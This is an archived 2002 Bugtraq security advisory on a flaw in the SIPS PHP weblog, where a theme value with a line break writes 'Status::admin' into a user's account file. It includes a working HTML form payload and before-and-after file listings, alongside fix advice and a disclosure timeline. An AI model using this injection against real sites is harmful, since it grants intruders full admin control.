Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

SIPS - vulnerable to anyone gaining admin access.

From: "b0iler _" <b0iler () hotmail com>
Date: Mon, 11 Feb 2002 23:13:11 -0700
#!/exploit/by/b0iler
# sips - http://sourceforge.net/projects/sips/
# versions lower than 0.3.1
Taken from freshmeat: "About: SIPS is an integrated Weblog and link-indexing system written in PHP. It is aimed at those with access to databaseless, PHP-enabled Web servers who want to run a Weblog site like Slashdot and/or a simple link index like Yahoo!."
Ok, this one took awhile to find since the code is long, but atleast it was fairly easy to read. The script works much like phpnuke or slashcode, SIPS stands for Simple Internet Publishing System. The problem that I found was when a user selects a theme to use it is written in their database file. Then when a user goes to use admin.php it just checks if the password for the user is correct and if they have the value Status equal to admin in their database. So I did alittle playing around and got a theme to do a linebreak and write Status::admin onto the end of the user's database. This makes the user an admin of the script giving them complete control over the site.
Key to securing this code is to filter all input, even if you think it won't be changed by the user.. it can be. Also checking to make sure the theme exists might be good. To exploit this we just need to change the theme's page to something like this:
<form action="http://www.site.com/sips/htdocs/preferences.php"; method="post"> 
<input type="hidden" name="op" value="theme">
<input type="hidden" name="action" value="settheme">
<select name="themename">
<option value="default
Status::admin
">Exploited</option>
</select>
<input type="submit" value="Set Theme"></form>

Here we submit a theme with the value of:

Default -linebreak
Status::admin -linebreak (SIPS chops the theme input).

This will change an account from something like this:

bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler () hotmail com
Theme::default
Timezone::Greenwich Mean

to something like this:

bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler () hotmail com
Timezone::Greenwich Mean
Theme::default
Status::admin
The Status::admin allows you to use http://www.site.com/sips/htdocs/admin/index.php, which will give you total control over SIPS (pretty much the whole site).
The author was contacted on 2/1/02 and replied the same day. Author updated to version 0.3.1 on 2/8/02 and wrote a very nice page detailing the problem and possible solutions: http://sips.sourceforge.net/adminvul.html 

-http://b0iler.advknowledge.net


_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com
Previous By Date Next
Previous By Thread Next

Current thread: